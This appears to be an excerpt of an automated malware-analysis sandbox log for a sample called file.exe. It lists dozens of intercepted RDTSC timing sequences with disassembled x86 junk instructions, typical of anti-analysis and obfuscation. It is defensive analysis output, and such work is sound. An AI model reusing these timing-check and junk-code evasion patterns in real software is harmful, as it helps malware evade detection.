                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E9E0 second address: 102E9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EAE9 second address: 102EAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EE56 second address: 102EE5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F3C8 second address: 102F3CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030E7F second address: 1030E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474DDA56Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10306A2 second address: 10306AC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB474E5AC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030E8D second address: 1030E92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030E92 second address: 1030F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ecx 0x0000000d mov dword ptr [ebp+1244D83Bh], eax 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FB474E5AC18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 js 00007FB474E5AC16h 0x00000036 sub esi, dword ptr [ebp+122D3829h] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FB474E5AC18h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D186Dh], edx 0x0000005e jnp 00007FB474E5AC2Ch 0x00000064 xchg eax, ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 push esi 0x00000068 push eax 0x00000069 pop eax 0x0000006a pop esi 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030F1E second address: 1030F35 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4752141B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FB4752141C0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1031932 second address: 10319BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FB47526A2E8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D3929h] 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FB47526A2E8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D3825h] 0x0000004b jmp 00007FB47526A2EDh 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D1D60h], ecx 0x00000058 movzx edi, bx 0x0000005b xchg eax, ebx 0x0000005c jmp 00007FB47526A2F5h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push ecx 0x00000067 pop ecx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10319BF second address: 10319C9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4752141B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10323C4 second address: 10323F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB47526A2E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D387Dh] 0x00000015 push 00000000h 0x00000017 mov si, 58BAh 0x0000001b push 00000000h 0x0000001d stc 0x0000001e mov edi, 5A1CF643h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 jng 00007FB47526A2E6h 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10323F4 second address: 10323FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB4752141B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103218A second address: 1032194 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB47526A2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10323FE second address: 1032402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032E0F second address: 1032E15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032E15 second address: 1032E1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FB4752141B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10361D2 second address: 10361D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10361D9 second address: 1036232 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB4752107F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pop esi 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D1E7Eh], edx 0x00000018 push 0000001Eh 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FB4752107F8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 nop 0x00000035 jmp 00007FB475210804h 0x0000003a push eax 0x0000003b jp 00007FB475210800h 0x00000041 push eax 0x00000042 push edx 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103632E second address: 1036334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10364CD second address: 1036502 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB4752107F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d js 00007FB4752107FCh 0x00000013 jng 00007FB4752107F6h 0x00000019 jmp 00007FB475210802h 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036502 second address: 1036528 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FB4752721A0h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036528 second address: 103652C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10365C3 second address: 10365C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10365C7 second address: 10365D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10365D3 second address: 10365D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10651F7 second address: 10651FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10651FF second address: 1065204 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101804A second address: 1018059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB4752107F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1018059 second address: 1018063 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB475272196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065339 second address: 106533D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10659F3 second address: 10659F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065B24 second address: 1065B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FB4752107F6h 0x0000000e jo 00007FB4752107F6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065B38 second address: 1065B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065B3C second address: 1065B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C401 second address: 106C406 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B13D second address: 106B143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B143 second address: 106B14D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB475272196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B14D second address: 106B162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FB4752107F6h 0x0000000d jns 00007FB4752107F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B162 second address: 106B168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ADCF second address: 106ADD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ADD3 second address: 106ADF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FB475272196h 0x0000000d jmp 00007FB4752721A0h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ADF2 second address: 106ADF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106BD71 second address: 106BD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106BD75 second address: 106BD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB475210800h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106BD91 second address: 106BD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070998 second address: 10709D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB475210805h 0x00000009 jp 00007FB4752107F6h 0x0000000f popad 0x00000010 push eax 0x00000011 ja 00007FB4752107F6h 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FB4752107FFh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10709D2 second address: 10709D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070BA6 second address: 1070BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FB4752107F8h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007FB4752107F6h 0x00000018 ja 00007FB4752107F6h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070BC7 second address: 1070BE6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB4752721A5h 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107102C second address: 1071032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10711C7 second address: 10711FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB4752721A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB4752721A7h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10714D7 second address: 10714DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107030D second address: 1070311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074CC9 second address: 1074CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074CCF second address: 1074CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074CDA second address: 1074CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB475210804h 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776A3 second address: 10776AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776AB second address: 10776B5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB4752107F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776B5 second address: 10776BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776BF second address: 10776C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A1E1 second address: 107A1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079D94 second address: 1079D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB4752107F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079D9E second address: 1079DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DA2 second address: 1079DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB4752107F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DB3 second address: 1079DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB475272196h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DBE second address: 1079DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB475210809h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DDD second address: 1079DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47527219Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB47527219Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DFA second address: 1079E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079E00 second address: 1079E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DDA6 second address: 107DDAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DDAA second address: 107DDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FB47527219Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D6D7 second address: 107D6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D6DB second address: 107D6FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB47527219Ch 0x0000000e jnp 00007FB47527219Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAC7 second address: 107DAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FB475210808h 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAE6 second address: 107DAEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAEB second address: 107DAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAF1 second address: 107DAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAF7 second address: 107DAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F278 second address: 107F2AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB47527219Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB4752721A4h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10836FA second address: 10836FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10836FE second address: 1083708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10839C8 second address: 10839F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FB4752107FAh 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FB475210801h 0x00000012 js 00007FB4752107F6h 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083B32 second address: 1083B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB475272196h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083B3C second address: 1083B60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB475210808h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10360D2 second address: 10360ED instructions: 0x00000000 rdtsc 0x00000002 js 00007FB475272198h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FB4752721A8h 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007FB475272196h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084B12 second address: 1084B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084B16 second address: 1084B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10890EF second address: 108910A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB475210803h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC2B second address: 108EC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4752721A1h 0x00000009 jmp 00007FB4752721A5h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FB4752721A5h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC70 second address: 108ECA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB4752107FEh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnp 00007FB4752107F6h 0x00000014 js 00007FB4752107F6h 0x0000001a jmp 00007FB475210803h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108ECA7 second address: 108ECB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB475272196h 0x0000000a rdtsc
